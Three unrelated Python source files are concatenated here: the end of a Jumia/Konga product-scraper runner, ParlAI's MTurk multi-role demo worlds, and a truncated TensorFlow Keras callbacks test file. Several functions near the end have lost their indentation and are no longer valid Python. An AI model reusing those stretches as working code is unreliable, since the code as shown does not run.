    konga_health_beauty = Process(target=konga, args=["health and beauty", "https://www.konga.com/category/beauty-health-personal-care-4"])
    jumia_electronics = Process(target=jumia, args=["electronics", "https://www.jumia.com.ng/electronics/"])
    konga_home_office = Process(target=konga, args=["home and office", "https://www.konga.com/category/home-kitchen-602"])
    jumia_phones_tablets = Process(target=jumia, args=["phones and tablets", "https://www.jumia.com.ng/phones-tablets/"])
    konga_phones_tablets = Process(target=konga, args=["phones and tablets", "https://www.konga.com/category/phones-tablets-5294"])
    jumia_computing = Process(target=jumia, args=["computing", "https://www.jumia.com.ng/computing/"])

    #start processes
    jumia_fashion.start()
    konga_fashion.start()
    jumia_electronics.start()
    konga_health_beauty.start()
    jumia_health_beauty.start()
    konga_computing.start()
    jumia_computing.start()
    konga_home_office.start()
    konga_phones_tablets.start()
    jumia_home_office.start()
    konga_electronics.start()
    jumia_phones_tablets.start()

    #join processes (wait for every scraper to finish)
    jumia_computing.join()
    konga_computing.join()
    konga_electronics.join()
    jumia_electronics.join()
    jumia_fashion.join()
    konga_fashion.join()
    konga_health_beauty.join()
    jumia_health_beauty.join()
    konga_home_office.join()
    konga_phones_tablets.join()
    jumia_home_office.join()
    jumia_phones_tablets.join()

    #Total number of rows in product table
    with app.app_context():
        print("TOTAL PRODUCTS: ", Products.query.count())

    #end timer
    end = perf_counter()
    print(f"time: {round((end - start) / 60, 2)}mins")
worlds.py | #!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
from parlai.mturk.core.worlds import MTurkOnboardWorld, MTurkTaskWorld
import threading
class AskerOnboardingWorld(MTurkOnboardWorld):
    """
    Onboarding world for the asker role.

    Shows the worker one instruction message, waits for any reply, and then
    marks the onboarding episode as complete.
    """

    def parley(self):
        intro = {
            'id': 'System',
            'text': (
                "Welcome onboard! You'll be playing the role of the asker. Ask "
                "a question that can be answered with just a number. Send any "
                "message to continue."
            ),
        }
        self.mturk_agent.observe(intro)
        # Any worker response completes onboarding.
        self.mturk_agent.act()
        self.episodeDone = True
class AnswererOnboardingWorld(MTurkOnboardWorld):
    """
    Onboarding world for the answerer role.

    Shows the worker one instruction message, waits for any reply, and then
    marks the onboarding episode as complete.
    """

    def parley(self):
        intro = {
            'id': 'System',
            'text': (
                "Welcome onboard! You'll be playing the role of the answerer. "
                "You'll be asked a question that should be answered with a number. "
                "Answer with something that makes sense. Enter any number to "
                "continue."
            ),
        }
        self.mturk_agent.observe(intro)
        # Any worker response completes onboarding.
        self.mturk_agent.act()
        self.episodeDone = True
class EvaluatorOnboardingWorld(MTurkOnboardWorld):
    """
    Onboarding world for the evaluator role.

    Shows the worker one instruction message, waits for any reply, and then
    marks the onboarding episode as complete.
    """

    def parley(self):
        intro = {
            'id': 'System',
            'text': (
                "Welcome onboard! You'll be playing the evaluator. You'll "
                "observe a series of three questions, and then you'll evaluate "
                "whether or not the exchange was accurate. Send an eval to begin."
            ),
        }
        self.mturk_agent.observe(intro)
        # Any worker response completes onboarding.
        self.mturk_agent.act()
        self.episodeDone = True
class MultiRoleAgentWorld(MTurkTaskWorld):
    """
    World to demonstrate workers with assymetric roles.

    This task amounts to three rounds and then an evaluation step. It is purposefully
    created as a task to demo multiple views and has no other purpose.
    """

    collector_agent_id = 'Moderator'

    def __init__(self, opt, mturk_agents):
        """Bind each MTurk agent to its role and reset per-episode state."""
        self.mturk_agents = mturk_agents
        for agent in mturk_agents:
            if agent.demo_role == 'Asker':
                self.asker = agent
            elif agent.demo_role == 'Answerer':
                self.answerer = agent
            else:  # 'Evaluator'
                self.evaluator = agent
        self.episodeDone = False
        self.turns = 0
        self.questions = []
        self.answers = []
        # Evaluator's verdict; stays None until the evaluation turn completes.
        self.accepted = None

    def parley(self):
        """Run one turn: three QA rounds, then a final evaluation round."""
        if self.turns == 0:
            # Instruction for evaluator
            ad = {'id': 'System', 'text': "Please observe the chat for accuracy."}
            self.evaluator.observe(ad)
        if self.turns < 3:
            # QA pairing
            ad = {
                'id': 'System',
                'text': "Please ask a question with a numeric answer.",
            }
            self.asker.observe(ad)
            question = self.asker.act()
            ad = {'id': 'System', 'text': 'Please answer this question.'}
            self.answerer.observe(ad)
            self.answerer.observe(question)
            self.evaluator.observe(question)
            answer = self.answerer.act()
            self.evaluator.observe(answer)
            self.asker.observe(answer)
            self.questions.append(question)
            self.answers.append(answer)
            self.turns += 1
        else:
            # evaluate
            ad = {'id': 'System', 'text': "Please provide your evaluation."}
            self.evaluator.observe(ad)
            ad = {'id': 'System', 'text': "Please wait for evaluation."}
            self.answerer.observe(ad)
            self.asker.observe(ad)
            # BUG FIX: this was assigned to `self.accepter` (a typo), so
            # get_custom_task_data() always reported 'evaluation': None.
            self.accepted = self.evaluator.act()
            self.episodeDone = True

    def episode_done(self):
        """Whether the episode (3 QA rounds + evaluation) has finished."""
        return self.episodeDone

    def shutdown(self):
        """Shut down all agents in parallel threads."""

        def shutdown_agent(agent):
            # MTurk agents accept a timeout kwarg; plain agents do not.
            try:
                agent.shutdown(timeout=None)
            except Exception:
                agent.shutdown()  # not MTurkAgent

        threads = []
        for agent in self.mturk_agents:
            t = threading.Thread(target=shutdown_agent, args=(agent,))
            t.start()
            threads.append(t)
        for t in threads:
            t.join()

    def review_work(self):
        # Can review the work here to accept or reject it
        pass

    def get_custom_task_data(self):
        # brings important data together for the task, to later be used for
        # creating the dataset. If data requires pickling, put it in a field
        # called 'needs-pickle'.
        return {
            'questions': self.questions,
            'answers': self.answers,
            'evaluation': self.accepted,
        }
|
callbacks_test.py | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for Keras callbacks."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import csv
import os
import re
import shutil
import sys
import threading
import time
import unittest
from absl.testing import parameterized
import numpy as np
from tensorflow.python import keras
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.framework import random_seed
from tensorflow.python.keras import keras_parameterized
from tensorflow.python.keras import testing_utils
from tensorflow.python.keras.engine import base_layer
from tensorflow.python.keras.engine import sequential
from tensorflow.python.keras.optimizer_v2 import gradient_descent
from tensorflow.python.ops import array_ops
from tensorflow.python.platform import test
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.summary import summary_iterator
from tensorflow.python.training import adam
from tensorflow.python.training import checkpoint_management
# h5py and requests are optional: tests that need them (HDF5 model saving,
# remote-monitor callbacks) skip themselves when the import fails.
try:
  import h5py  # pylint:disable=g-import-not-at-top
except ImportError:
  h5py = None

try:
  import requests  # pylint:disable=g-import-not-at-top
except ImportError:
  requests = None

# Shared fixture dimensions used by the tests below.
TRAIN_SAMPLES = 10
TEST_SAMPLES = 10
NUM_CLASSES = 2
INPUT_DIM = 3
NUM_HIDDEN = 5
BATCH_SIZE = 5
class Counter(keras.callbacks.Callback):
  """Counts the number of times each callback method was run.

  Attributes:
    method_counts: dict. Contains the counts of time each callback method was
      run.
  """

  def __init__(self):
    self.method_counts = collections.defaultdict(int)
    hook_names = [
        'on_batch_begin', 'on_batch_end', 'on_epoch_begin', 'on_epoch_end',
        'on_predict_batch_begin', 'on_predict_batch_end', 'on_predict_begin',
        'on_predict_end', 'on_test_batch_begin', 'on_test_batch_end',
        'on_test_begin', 'on_test_end', 'on_train_batch_begin',
        'on_train_batch_end', 'on_train_begin', 'on_train_end'
    ]
    # Replace each hook on this instance with a counting wrapper around the
    # inherited implementation.
    for hook in hook_names:
      original = getattr(self, hook)
      setattr(self, hook, self.wrap_with_counts(hook, original))

  def wrap_with_counts(self, method_name, method):
    """Returns `method` wrapped to bump method_counts[method_name] per call."""

    def _counted(*args, **kwargs):
      self.method_counts[method_name] += 1
      return method(*args, **kwargs)

    return _counted
def _get_numpy():
return np.ones((10, 10)), np.ones((10, 1))
def _get_sequence():
  """Returns a 5-batch keras Sequence of constant ones, paired with None."""

  class _ConstantSequence(keras.utils.data_utils.Sequence):

    def __getitem__(self, index):
      # Every batch is identical: 2 samples of 10 features / 1 target.
      return np.ones((2, 10)), np.ones((2, 1))

    def __len__(self):
      return 5

  return _ConstantSequence(), None
@keras_parameterized.run_with_all_model_types
@keras_parameterized.run_all_keras_modes
class CallbackCountsTest(keras_parameterized.TestCase):
  """Verifies how many times each callback hook fires in fit/evaluate/predict."""

  def _check_counts(self, counter, expected_counts):
    """Checks that the counts registered by `counter` are those expected."""
    for method_name, expected_count in expected_counts.items():
      self.assertEqual(
          counter.method_counts[method_name],
          expected_count,
          msg='For method {}: expected {}, got: {}'.format(
              method_name, expected_count, counter.method_counts[method_name]))

  def _get_model(self):
    # Minimal binary classifier shared by all tests in this class.
    layers = [
        keras.layers.Dense(10, activation='relu'),
        keras.layers.Dense(1, activation='sigmoid')
    ]
    model = testing_utils.get_model_from_layers(layers, input_shape=(10,))
    model.compile(
        adam.AdamOptimizer(0.001),
        'binary_crossentropy',
        run_eagerly=testing_utils.should_run_eagerly(),
        experimental_run_tf_function=testing_utils.should_run_tf_function())
    return model

  @parameterized.named_parameters(('with_numpy', _get_numpy()),
                                  ('with_sequence', _get_sequence()))
  def test_callback_hooks_are_called_in_fit(self, data):
    x, y = data
    val_x, val_y = np.ones((4, 10)), np.ones((4, 1))
    # Sequence inputs size the run via steps, numpy inputs via batch_size.
    is_sequence = isinstance(x, keras.utils.data_utils.Sequence)
    model = self._get_model()
    counter = Counter()
    model.fit(
        x,
        y,
        validation_data=(val_x, val_y),
        batch_size=2 if not is_sequence else None,
        steps_per_epoch=5 if is_sequence else None,
        epochs=5,
        callbacks=[counter])
    # 5 epochs * 5 train batches = 25; 5 epochs * 2 validation batches = 10.
    self._check_counts(
        counter, {
            'on_batch_begin': 25,
            'on_batch_end': 25,
            'on_epoch_begin': 5,
            'on_epoch_end': 5,
            'on_predict_batch_begin': 0,
            'on_predict_batch_end': 0,
            'on_predict_begin': 0,
            'on_predict_end': 0,
            'on_test_batch_begin': 10,
            'on_test_batch_end': 10,
            'on_test_begin': 5,
            'on_test_end': 5,
            'on_train_batch_begin': 25,
            'on_train_batch_end': 25,
            'on_train_begin': 1,
            'on_train_end': 1
        })

  @parameterized.named_parameters(('with_numpy', _get_numpy()),
                                  ('with_sequence', _get_sequence()))
  def test_callback_hooks_are_called_in_evaluate(self, data):
    x, y = data
    is_sequence = isinstance(x, keras.utils.data_utils.Sequence)
    model = self._get_model()
    counter = Counter()
    model.evaluate(
        x,
        y,
        batch_size=2 if not is_sequence else None,
        steps=5 if is_sequence else None,
        callbacks=[counter])
    # One evaluation pass of 5 batches.
    self._check_counts(
        counter, {
            'on_test_batch_begin': 5,
            'on_test_batch_end': 5,
            'on_test_begin': 1,
            'on_test_end': 1
        })

  @parameterized.named_parameters(('with_numpy', _get_numpy()),
                                  ('with_sequence', _get_sequence()))
  def test_callback_hooks_are_called_in_predict(self, data):
    x = data[0]
    is_sequence = isinstance(x, keras.utils.data_utils.Sequence)
    model = self._get_model()
    counter = Counter()
    model.predict(
        x,
        batch_size=2 if not is_sequence else None,
        steps=5 if is_sequence else None,
        callbacks=[counter])
    # One prediction pass of 5 batches.
    self._check_counts(
        counter, {
            'on_predict_batch_begin': 5,
            'on_predict_batch_end': 5,
            'on_predict_begin': 1,
            'on_predict_end': 1
        })

  def test_callback_list_methods(self):
    # CallbackList should forward each batch-level hook exactly once.
    counter = Counter()
    callback_list = keras.callbacks.CallbackList([counter])
    batch = 0
    callback_list.on_test_batch_begin(batch)
    callback_list.on_test_batch_end(batch)
    callback_list.on_predict_batch_begin(batch)
    callback_list.on_predict_batch_end(batch)
    self._check_counts(
        counter, {
            'on_test_batch_begin': 1,
            'on_test_batch_end': 1,
            'on_predict_batch_begin': 1,
            'on_predict_batch_end': 1
        })
class KerasCallbacksTest(keras_parameterized.TestCase):
  def _get_model(self, input_shape=None):
    """Builds a tiny 2-class model whose metric is named 'my_acc'."""
    layers = [
        keras.layers.Dense(3, activation='relu'),
        keras.layers.Dense(2, activation='softmax')
    ]
    # input_shape=None defers building until first fit (see deferred test).
    model = testing_utils.get_model_from_layers(layers, input_shape=input_shape)
    model.compile(
        loss='mse',
        optimizer='rmsprop',
        metrics=[keras.metrics.CategoricalAccuracy(name='my_acc')],
        run_eagerly=testing_utils.should_run_eagerly(),
        experimental_run_tf_function=testing_utils.should_run_tf_function())
    return model
  @keras_parameterized.run_with_all_model_types
  @keras_parameterized.run_all_keras_modes
  def test_progbar_logging(self):
    """Progress bar output should contain the loss and the 'my_acc' metric."""
    model = self._get_model(input_shape=(3,))
    x = array_ops.ones((50, 3))
    y = array_ops.zeros((50, 2))
    dataset = dataset_ops.Dataset.from_tensor_slices((x, y)).batch(10)
    expected_log = r'(.*- loss:.*- my_acc:.*)+'
    with self.captureWritesToStream(sys.stdout) as printed:
      model.fit(dataset, epochs=2, steps_per_epoch=10)
      self.assertRegexpMatches(printed.contents(), expected_log)
  @keras_parameterized.run_with_all_model_types(exclude_models='functional')
  @keras_parameterized.run_all_keras_modes
  def test_progbar_logging_deferred_model_build(self):
    """Progbar logging also works when the model is built on first fit."""
    model = self._get_model()
    # No input_shape was given, so the model must not be built yet.
    self.assertFalse(model.built)
    x = array_ops.ones((50, 3))
    y = array_ops.zeros((50, 2))
    dataset = dataset_ops.Dataset.from_tensor_slices((x, y)).batch(10)
    expected_log = r'(.*- loss:.*- my_acc:.*)+'
    with self.captureWritesToStream(sys.stdout) as printed:
      model.fit(dataset, epochs=2, steps_per_epoch=10)
      self.assertRegexpMatches(printed.contents(), expected_log)
  @keras_parameterized.run_with_all_model_types
  @keras_parameterized.run_all_keras_modes
  def test_progbar_logging_validation_data(self):
    """Progbar output should include val_loss/val_my_acc with validation data."""
    model = self._get_model(input_shape=(3,))
    x = array_ops.ones((50, 3))
    y = array_ops.zeros((50, 2))
    training_dataset = dataset_ops.Dataset.from_tensor_slices((x, y)).batch(10)
    val_dataset = dataset_ops.Dataset.from_tensor_slices((x, y)).batch(10)
    # 5 steps per epoch (50 samples / batch 10), plus validation metrics.
    expected_log = r'(.*5/5.*- loss:.*- my_acc:.*- val_loss:.*- val_my_acc:.*)+'
    with self.captureWritesToStream(sys.stdout) as printed:
      model.fit(training_dataset, epochs=2, validation_data=val_dataset)
      self.assertRegexpMatches(printed.contents(), expected_log)
  @keras_parameterized.run_with_all_model_types
  @keras_parameterized.run_all_keras_modes
  def test_progbar_logging_validation_split(self):
    """Progbar output should reflect an 80/20 validation_split."""
    model = self._get_model(input_shape=(3,))
    x = np.ones((100, 3))
    y = np.zeros((100, 2))
    # 100 samples with validation_split=0.2 -> 80 training samples per epoch.
    expected_log = (
        r'(?s).*1/2.*80/80.*- loss:.*- my_acc:.*- val_loss:.*- val_my_acc:'
        r'.*2/2.*80/80.*- loss:.*- my_acc:.*- val_loss:.*- val_my_acc:.*')
    with self.captureWritesToStream(sys.stdout) as printed:
      model.fit(x, y, batch_size=10, epochs=2, validation_split=0.2)
      self.assertRegexpMatches(printed.contents(), expected_log)
  @keras_parameterized.run_with_all_model_types
  def test_ModelCheckpoint(self):
    """End-to-end coverage of `ModelCheckpoint` options.

    Exercises `monitor`, `mode`, `save_best_only`, the deprecated `period`
    argument, and both string and integer `save_freq` values, verifying
    after each `fit` which checkpoint files exist on disk.
    """
    if h5py is None:
      return  # Skip test if models cannot be saved.

    layers = [
        keras.layers.Dense(NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'),
        keras.layers.Dense(NUM_CLASSES, activation='softmax')
    ]
    model = testing_utils.get_model_from_layers(layers, input_shape=(10,))
    model.compile(
        loss='categorical_crossentropy', optimizer='rmsprop', metrics=['acc'])

    temp_dir = self.get_temp_dir()
    self.addCleanup(shutil.rmtree, temp_dir, ignore_errors=True)
    filepath = os.path.join(temp_dir, 'checkpoint.h5')
    (x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
        train_samples=TRAIN_SAMPLES,
        test_samples=TEST_SAMPLES,
        input_shape=(INPUT_DIM,),
        num_classes=NUM_CLASSES)
    y_test = keras.utils.to_categorical(y_test)
    y_train = keras.utils.to_categorical(y_train)

    # case 1: mode='auto', save_best_only=False -> file is always written.
    monitor = 'val_loss'
    save_best_only = False
    mode = 'auto'

    model = keras.models.Sequential()
    model.add(
        keras.layers.Dense(
            NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'))
    model.add(keras.layers.Dense(NUM_CLASSES, activation='softmax'))
    model.compile(
        loss='categorical_crossentropy', optimizer='rmsprop', metrics=['acc'])

    cbks = [
        keras.callbacks.ModelCheckpoint(
            filepath,
            monitor=monitor,
            save_best_only=save_best_only,
            mode=mode)
    ]
    model.fit(
        x_train,
        y_train,
        batch_size=BATCH_SIZE,
        validation_data=(x_test, y_test),
        callbacks=cbks,
        epochs=1,
        verbose=0)
    assert os.path.exists(filepath)
    os.remove(filepath)

    # case 2: explicit mode='min' on val_loss.
    mode = 'min'
    cbks = [
        keras.callbacks.ModelCheckpoint(
            filepath,
            monitor=monitor,
            save_best_only=save_best_only,
            mode=mode)
    ]
    model.fit(
        x_train,
        y_train,
        batch_size=BATCH_SIZE,
        validation_data=(x_test, y_test),
        callbacks=cbks,
        epochs=1,
        verbose=0)
    assert os.path.exists(filepath)
    os.remove(filepath)

    # case 3: explicit mode='max' on an accuracy-style metric.
    mode = 'max'
    monitor = 'val_acc'
    cbks = [
        keras.callbacks.ModelCheckpoint(
            filepath,
            monitor=monitor,
            save_best_only=save_best_only,
            mode=mode)
    ]
    model.fit(
        x_train,
        y_train,
        batch_size=BATCH_SIZE,
        validation_data=(x_test, y_test),
        callbacks=cbks,
        epochs=1,
        verbose=0)
    assert os.path.exists(filepath)
    os.remove(filepath)

    # case 4: save_best_only=True still writes on the first (best-so-far) epoch.
    save_best_only = True
    cbks = [
        keras.callbacks.ModelCheckpoint(
            filepath,
            monitor=monitor,
            save_best_only=save_best_only,
            mode=mode)
    ]
    model.fit(
        x_train,
        y_train,
        batch_size=BATCH_SIZE,
        validation_data=(x_test, y_test),
        callbacks=cbks,
        epochs=1,
        verbose=0)
    assert os.path.exists(filepath)
    os.remove(filepath)

    # Case: metric not available.
    cbks = [
        keras.callbacks.ModelCheckpoint(
            filepath,
            monitor='unknown',
            save_best_only=True)
    ]
    model.fit(
        x_train,
        y_train,
        batch_size=BATCH_SIZE,
        validation_data=(x_test, y_test),
        callbacks=cbks,
        epochs=1,
        verbose=0)
    # File won't be written.
    assert not os.path.exists(filepath)

    # case 5: `period=2` saves only on even-numbered epochs; the filepath
    # template embeds the epoch number.
    save_best_only = False
    period = 2
    mode = 'auto'

    filepath = os.path.join(temp_dir, 'checkpoint.{epoch:02d}.h5')
    cbks = [
        keras.callbacks.ModelCheckpoint(
            filepath,
            monitor=monitor,
            save_best_only=save_best_only,
            mode=mode,
            period=period)
    ]
    model.fit(
        x_train,
        y_train,
        batch_size=BATCH_SIZE,
        validation_data=(x_test, y_test),
        callbacks=cbks,
        epochs=4,
        verbose=1)
    assert os.path.exists(filepath.format(epoch=2))
    assert os.path.exists(filepath.format(epoch=4))
    os.remove(filepath.format(epoch=2))
    os.remove(filepath.format(epoch=4))
    assert not os.path.exists(filepath.format(epoch=1))
    assert not os.path.exists(filepath.format(epoch=3))

    # Invalid use: this will raise a warning but not an Exception.
    keras.callbacks.ModelCheckpoint(
        filepath,
        monitor=monitor,
        save_best_only=save_best_only,
        mode='unknown')

    # Case 6: `ModelCheckpoint` with a combination of `save_freq` and `period`.
    # Though `period` is deprecated, we're testing it for
    # backward-compatibility.
    filepath = os.path.join(temp_dir, 'checkpoint.epoch{epoch:02d}.h5')
    cbks = [
        keras.callbacks.ModelCheckpoint(
            filepath, monitor=monitor, mode=mode, save_freq='epoch', period=5)
    ]
    assert not os.path.exists(filepath.format(epoch=0))
    assert not os.path.exists(filepath.format(epoch=5))
    model.fit(
        x_train,
        y_train,
        batch_size=2,
        validation_data=(x_test, y_test),
        callbacks=cbks,
        epochs=10,
        verbose=1)
    # With save_freq='epoch' and period=5, only every 5th epoch is saved.
    assert not os.path.exists(filepath.format(epoch=1))
    assert not os.path.exists(filepath.format(epoch=2))
    assert not os.path.exists(filepath.format(epoch=3))
    assert not os.path.exists(filepath.format(epoch=4))
    assert os.path.exists(filepath.format(epoch=5))
    assert not os.path.exists(filepath.format(epoch=6))
    assert os.path.exists(filepath.format(epoch=10))
    os.remove(filepath.format(epoch=5))
    os.remove(filepath.format(epoch=10))

    # Case 7: `ModelCheckpoint` with an integer `save_freq`
    filepath = os.path.join(temp_dir, 'checkpoint.epoch{epoch:02d}.h5')
    cbks = [
        keras.callbacks.ModelCheckpoint(
            filepath,
            monitor=monitor,
            save_best_only=save_best_only,
            mode=mode,
            save_freq=30,
            period=100)  # The period should be ignored (this test tests this).
    ]
    assert not os.path.exists(filepath.format(epoch=3))
    model.fit(
        x_train,
        y_train,
        batch_size=2,
        validation_data=(x_test, y_test),
        callbacks=cbks,
        epochs=10,
        verbose=1)
    # save_freq=30 batches with 10 batches/epoch -> saves at epochs 3, 6, 9.
    assert not os.path.exists(filepath.format(epoch=1))
    assert not os.path.exists(filepath.format(epoch=2))
    assert os.path.exists(filepath.format(epoch=3))
    assert not os.path.exists(filepath.format(epoch=4))
    assert not os.path.exists(filepath.format(epoch=5))
    assert os.path.exists(filepath.format(epoch=6))
    assert not os.path.exists(filepath.format(epoch=7))
    assert not os.path.exists(filepath.format(epoch=8))
    assert os.path.exists(filepath.format(epoch=9))
    os.remove(filepath.format(epoch=3))
    os.remove(filepath.format(epoch=6))
    os.remove(filepath.format(epoch=9))

    # Case 8: `ModelCheckpoint` with valid and invalid save_freq argument.
    # NOTE(review): `assertRaisesRegexp` is a deprecated alias removed in
    # Python 3.12; prefer `assertRaisesRegex`.
    with self.assertRaisesRegexp(ValueError, 'Unrecognized save_freq'):
      keras.callbacks.ModelCheckpoint(
          filepath,
          monitor=monitor,
          save_best_only=save_best_only,
          mode=mode,
          save_freq='invalid_save_freq')
    # The following should not raise ValueError.
    keras.callbacks.ModelCheckpoint(
        filepath,
        monitor=monitor,
        save_best_only=save_best_only,
        mode=mode,
        save_freq='epoch')
    keras.callbacks.ModelCheckpoint(
        filepath,
        monitor=monitor,
        save_best_only=save_best_only,
        mode=mode,
        save_freq=3)
  def _run_load_weights_on_restart_test_common_iterations(self):
    """Shared setup: trains a trivial model with per-epoch weight checkpoints.

    Trains for 3 epochs WITH a `ModelCheckpoint` callback (producing
    `checkpoint.epochNN.h5` files), then one more epoch WITHOUT it, and
    captures the resulting weights.

    Returns:
      Tuple `(model, train_ds, filepath, weights_after_one_more_epoch)`
      where `filepath` is the epoch-templated checkpoint path pattern.
    """

    def get_input_datasets():
      # Simple training input.
      train_input = [[1]] * 16
      train_label = [[0]] * 16
      ds = dataset_ops.Dataset.from_tensor_slices((train_input, train_label))
      return ds.batch(8, drop_remainder=True)

    class Bias(base_layer.Layer):
      # Single-weight layer: output = input + bias.

      def build(self, input_shape):
        # NOTE(review): `add_variable` looks like a legacy alias of
        # `add_weight` — confirm before modernizing.
        self.bias = self.add_variable('bias', (1,), initializer='zeros')

      def call(self, inputs):
        return inputs + self.bias

    # Very simple bias model to eliminate randomness.
    optimizer = gradient_descent.SGD(0.1)
    model = sequential.Sequential()
    model.add(Bias(input_shape=(1,)))
    model.compile(loss='mae', optimizer=optimizer, metrics=['mae'])
    train_ds = get_input_datasets()

    temp_dir = self.get_temp_dir()
    filepath = os.path.join(temp_dir, 'checkpoint.epoch{epoch:02d}.h5')
    initial_epochs = 3

    # The filepath shouldn't exist at the beginning.
    self.assertFalse(os.path.exists(filepath))
    callback = keras.callbacks.ModelCheckpoint(
        filepath=filepath, save_weights_only=True)
    model.fit(train_ds, epochs=initial_epochs, callbacks=[callback])

    # The files should exist after fitting with callback.
    for epoch in range(initial_epochs):
      self.assertTrue(os.path.exists(filepath.format(epoch=epoch + 1)))
    self.assertFalse(os.path.exists(filepath.format(epoch=initial_epochs + 1)))
    self.assertEqual(
        callback._get_most_recently_modified_file_matching_pattern(filepath),
        filepath.format(epoch=initial_epochs))

    model.fit(train_ds, epochs=1)
    weights_after_one_more_epoch = model.get_weights()

    # The filepath should continue to exist after fitting without callback.
    for epoch in range(initial_epochs):
      self.assertTrue(os.path.exists(filepath.format(epoch=epoch + 1)))

    return model, train_ds, filepath, weights_after_one_more_epoch
  @staticmethod
  def get_ModelCheckpoint_load_weights_on_restart_true_test(save_weights_only):
    """Builds a test for `load_weights_on_restart=True`.

    The generated test checks that a new `fit` with the callback restores
    the latest checkpoint before training, so one restored epoch matches
    one plain epoch of training.
    """

    def func(self):
      (model, train_ds, filepath, weights_after_one_more_epoch
      ) = self._run_load_weights_on_restart_test_common_iterations()

      # Sleep for some short time period ensuring the files are created with
      # a different time (in MacOS OSS the granularity is only 1 second).
      time.sleep(2)
      callback = keras.callbacks.ModelCheckpoint(
          filepath=filepath,
          save_weights_only=save_weights_only,
          load_weights_on_restart=True)
      model.fit(train_ds, epochs=1, callbacks=[callback])
      weights_after_model_restoring_and_one_more_epoch = model.get_weights()

      self.assertEqual(
          callback._get_most_recently_modified_file_matching_pattern(filepath),
          filepath.format(epoch=1))

      model.fit(
          train_ds,
          epochs=1,
          callbacks=[
              keras.callbacks.ModelCheckpoint(
                  filepath=filepath,
                  save_weights_only=save_weights_only,
                  load_weights_on_restart=True)
          ])
      weights_with_one_final_extra_epoch = model.get_weights()

      # Asserting the weights one epoch after initial fitting and another epoch
      # after that are close, if a ModelCheckpoint with
      # load_weights_on_restart=True is given (so the model is restored at the
      # beginning of training).
      self.assertAllClose(weights_after_one_more_epoch,
                          weights_after_model_restoring_and_one_more_epoch)
      self.assertNotAllClose(weights_after_one_more_epoch,
                             weights_with_one_final_extra_epoch)

    return func
  @staticmethod
  def get_ModelCheckpoint_load_weights_on_restart_false_test(save_weights_only):
    """Builds a test for the default `load_weights_on_restart=False`.

    The generated test checks that without restoration, continuing training
    from the current in-memory weights yields different weights than the
    captured one-epoch baseline.
    """

    def func(self):
      (model, train_ds, filepath, weights_after_one_more_epoch
      ) = self._run_load_weights_on_restart_test_common_iterations()

      model.fit(
          train_ds,
          epochs=1,
          callbacks=[
              keras.callbacks.ModelCheckpoint(
                  filepath=filepath, save_weights_only=save_weights_only)
          ])
      weights_after_model_restoring_and_one_more_epoch = model.get_weights()

      # Asserting the weights one epoch after initial fitting and another epoch
      # after that are different, if a ModelCheckpoint with
      # load_weights_on_restart=False is given (so the model is not restored at
      # the beginning of training).
      self.assertNotAllClose(weights_after_one_more_epoch,
                             weights_after_model_restoring_and_one_more_epoch)

    return func
test_model_checkpoint_load_weights_on_restart_true_save_weights_only_true = \
get_ModelCheckpoint_load_weights_on_restart_true_test.__func__(True)
test_model_checkpoint_load_weights_on_restart_true_save_weights_only_false = \
get_ModelCheckpoint_load_weights_on_restart_true_test.__func__(False)
test_model_checkpoint_load_weights_on_restart_false_save_weights_only_true = \
get_ModelCheckpoint_load_weights_on_restart_false_test.__func__(True)
test_model_checkpoint_load_weights_on_restart_false_save_weights_only_false \
= get_ModelCheckpoint_load_weights_on_restart_false_test.__func__(False)
def test_ModelCheckpoint_override_if_file_exist(self):
(model, train_ds, filepath,
_) = self._run_load_weights_on_restart_test_common_iterations()
# Sleep for some short time period to ensure the files are created with
# a different time (in MacOS OSS the granularity is only 1 second).
time.sleep(2)
callback = keras.callbacks.ModelCheckpoint(
filepath=filepath, save_weights_only=True)
model.load_weights(
callback._get_most_recently_modified_file_matching_pattern(filepath))
weights_before_additional_fit = model.get_weights()
model.fit(train_ds, epochs=1, callbacks=[callback])
model.load_weights(
callback._get_most_recently_modified_file_matching_pattern(filepath))
weights_after_additional_fit = model.get_weights()
self.assertNotAllClose(weights_before_additional_fit,
weights_after_additional_fit)
def test_EarlyStopping(self):
with self.cached_session():
np.random.seed(123)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
model = testing_utils.get_small_sequential_mlp(
num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
model.compile(
loss='categorical_crossentropy', optimizer='rmsprop', metrics=['acc'])
cases = [
('max', 'val_acc'),
('min', 'val_loss'),
('auto', 'val_acc'),
('auto', 'loss'),
('unknown', 'unknown')
]
for mode, monitor in cases:
patience = 0
cbks = [
keras.callbacks.EarlyStopping(
patience=patience, monitor=monitor, mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=5,
verbose=0)
def test_EarlyStopping_reuse(self):
with self.cached_session():
np.random.seed(1337)
patience = 3
data = np.random.random((100, 1))
labels = np.where(data > 0.5, 1, 0)
model = keras.models.Sequential((keras.layers.Dense(
1, input_dim=1, activation='relu'), keras.layers.Dense(
1, activation='sigmoid'),))
model.compile(
optimizer='sgd', loss='binary_crossentropy', metrics=['accuracy'])
weights = model.get_weights()
stopper = keras.callbacks.EarlyStopping(monitor='acc', patience=patience)
hist = model.fit(data, labels, callbacks=[stopper], verbose=0, epochs=20)
assert len(hist.epoch) >= patience
# This should allow training to go for at least `patience` epochs
model.set_weights(weights)
